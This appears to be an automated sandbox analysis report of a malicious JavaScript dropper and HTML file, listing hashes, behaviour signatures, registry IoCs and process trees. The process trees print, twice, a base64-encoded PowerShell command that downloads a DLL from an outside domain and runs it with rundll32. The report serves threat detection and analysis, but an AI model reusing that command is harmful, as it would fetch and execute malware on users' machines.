7604b05ed53d83b49325c5a16a8e521e1a0a6c4100a3a96850c881392234cecf

Analysis

max time kernel
149s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14/03/2023, 14:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Molestiae.html
Size

15KB
MD5

00eeed31b49f57f5a2b25174dc0d50ed
SHA1

952b8063d0e9e7c1e9a1b65c9870a0cb911bfc09
SHA256

7604b05ed53d83b49325c5a16a8e521e1a0a6c4100a3a96850c881392234cecf
SHA512

b31ed4b9aa7364449ce08ec57e9390bae83ce9a95038b669925df5d620dcc8f1134c1b6e9bd3a4c0427854d39b75c127591d98b39251fca83434f3efe4a94ad3
SSDEEP

384:PxEz5R24ZNzvZu8lgzUJOwJL3AIQjTxvO9NqZ:PF4ZNTbUYljAIatT

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
66	5044	powershell.exe
82	4208	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\cad456c2-e616-4927-87af-e2baa3198577.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230314150413.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	msedge.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
1396	NOTEPAD.EXE
3416	Notepad.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1544	powershell.exe
1544	powershell.exe
3636	msedge.exe
3636	msedge.exe
3676	msedge.exe
3676	msedge.exe
1316	msedge.exe
1316	msedge.exe
2092	identity_helper.exe
2092	identity_helper.exe
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
4332	msedge.exe
4332	msedge.exe
4332	msedge.exe
4332	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	4208	powershell.exe

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe
3676	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3676 wrote to memory of 4556	3676	msedge.exe	86
PID 3676 wrote to memory of 4556	3676	msedge.exe	86
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 4468	3676	msedge.exe	87
PID 3676 wrote to memory of 3636	3676	msedge.exe	88
PID 3676 wrote to memory of 3636	3676	msedge.exe	88
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89
PID 3676 wrote to memory of 3840	3676	msedge.exe	89

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start shell:Appsfolder\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge C:\Users\Admin\AppData\Local\Temp\Molestiae.html
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-redirect=Windows.Launch C:\Users\Admin\AppData\Local\Temp\Molestiae.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd72be46f8,0x7ffd72be4708,0x7ffd72be4718
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
  2⤵
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:1176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5248 /prefetch:8
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1316
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:8
  2⤵
  PID:1932
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:208
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff6232c5460,0x7ff6232c5470,0x7ff6232c5480
    3⤵
    PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
  2⤵
  PID:4192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:1128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:2204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
  2⤵
  PID:2416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,17595641949390669753,16260089298076384772,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6148 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4332

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4672

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1560

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_fgz.zip\version (47).txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1396

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_fgz.zip\debitis.js"
1⤵
- Checks computer location settings
PID:776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBzAG8AZgB0AHMAdwBhAHAAcAAuAGMAbwBtAC8AVgBDAHYALwB0ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABTAGkAbgBvAHAAaQBzAC4AZABsAGwAOwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAUwBpAG4AbwBwAGkAcwAuAGQAbABsACwAWABTADgAOAA7AA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5044
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\Sinopis.dll XS88
    3⤵
    PID:5076

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\debitis.js"
1⤵
- Checks computer location settings
PID:4560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBzAG8AZgB0AHMAdwBhAHAAcAAuAGMAbwBtAC8AVgBDAHYALwB0ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABTAGkAbgBvAHAAaQBzAC4AZABsAGwAOwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAUwBpAG4AbwBwAGkAcwAuAGQAbABsACwAWABTADgAOAA7AA=="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4208
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\\Sinopis.dll XS88
    3⤵
    PID:1768

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\debitis.js
1⤵
- Opens file in notepad (likely ransom note)
PID:3416

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aaeb1f5e097ab38083674077b84b8ed6

SHA1
7d9191cb2277c30f1147c9d29d75fc8e6aa0a4f2

SHA256
1654b27bfaeee49bfe56e0c4c0303418f4887f3ea1933f03cafce10352321aef

SHA512
130f1b62134626959f69b13e33c42c3182e343d7f0a5b6291f7bb0c2f64b60885f5e6331e1866a4944e9b7b2e49fe798e073316fde23927ede2c348ba0e56eda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1db53baf44edd6b1bc2b7576e2f01e12

SHA1
e35739fa87978775dcb3d8df5c8d2063631fa8df

SHA256
0d73ba3eea4c552ce3ffa767e4cd5fff4e459e543756987ab5d55f1e6d963f48

SHA512
84f544858803ac14bac962d2df1dbc7ed6e1134ecf16d242d7ee7316648b56b5bc095241363837bf0bf0afd16ca7deebe7afb7d40057604acbf09821fd5a9912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk

Filesize
2KB

MD5
e23c339f5466a70b256d4ec40ec7199a

SHA1
b81b2072a69985423779430a35286a510e0ffe15

SHA256
73532fbcf55fc3ee9736c769ea21d809d718b30abbcdb50644a9cc99f2540e15

SHA512
e5e3c48c3557b7be9e77757bbb779286e3b76a45e94144d8e404f958fd4c869339b561d5a73d16231d7b22363c426f3c2f29d4d49eba4169e2ecbc8689eda9af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
606B

MD5
977b634843853e69d2aa2631d112a3a2

SHA1
e3dafffe0b1b05340a5198f769ee1635efb348ad

SHA256
f6c6b3c36baca7d65ad4428c17c3e3639bf2220934a362591593af8ad0190d11

SHA512
5fc635b752769c8a158ae57df6d56281e6cbca947d959d59d93496b9bdb0bac983d116789cc7e93cec0c3444fab4b42f58cad6ceda5bafed4bc67278be4a0c6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
98326051ee3725a50fc9dcbd0401a728

SHA1
498a2f43f67a223df48324b53fe04305000f9c8d

SHA256
0caabc9ab9e42291c59a0ccf2cf7db2d11c918ff1b391d71a01d96aea0e37a80

SHA512
1dec31671693e0dd962304793bf516539d73fad387556bfd5dbbb7dccf6990a8d73206f65c9ca80b1e028fc4d9dbf6556aeeea9bfe373bd7c3fd3bb95b084d8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
74cc5b248c15745e68bcf1b6675e4a68

SHA1
be179eb1c5e8139a24911501865b1fd27d958cfa

SHA256
2ae82c356e13599c1f8832894e1659c22faa2cf8a5185de23e5357b661077222

SHA512
9b28b62511a7c2ff40cfb954e550837b0489aff5151b2e0ed25f367b3141e49472598a5234a38c4d83400707ac8988d10a20dbdb2e6d39df0b2b971c3bc2aca9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
da3b65d6dbaa0b6540c08c5d5bd06cf3

SHA1
7ffe6025d548de380774e42914c90c88a449b559

SHA256
070e08463b7a2c7ddad32ead2c4fac2ed93ef14e06d01180d95d89df1b7464f5

SHA512
a496b25607497a9085a472219b30c5367bb79320570ac37698275d5ea9dc0aed426f618a0a48f88fb292b4297250bad75e0d5fec177f71dd1f75afeb9b6e481f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
85cee4e80af9d304c3ecc4ddd7fd3b04

SHA1
615c8cd25aa6d90f48220d0ba03590bea39763a2

SHA256
9d559056cfe3d454f5b23f3ecb836e44b530c6901bc51261c6f45e724601527e

SHA512
163b7a56a9753938429325c4d341134b12dab516d7851b5e4935d20787617dd843672740e005ba7147cb7639ad59b74275669e73b49a3d7a3eee684e7518ffd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
47e94a96372e6f095b8a3fd7edc48ec0

SHA1
377b68f34e5964ca8be1b1b0c1507dd7f0e5f005

SHA256
15c77bafd922bd085317fd544d0fa129e3b8c814e3ba0d48936366004427732e

SHA512
5bd63de2e831805b723d7ddf1343c3b721ef5b757d9ab01bf8554ef8e29ac2cc09fa104fc85d530f27d66b67280774b3ebbef6729ea3ab61ce8028ab4ba5bdad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
5ce18f069fc97b5010eff1883cc431dd

SHA1
6edc1a3b1e06eaf439d87f06e5ec138a68ca5537

SHA256
9fca12aa9dbaad89e7a97b1a80c10077509ef5cc75cfe27312f05de75b73a356

SHA512
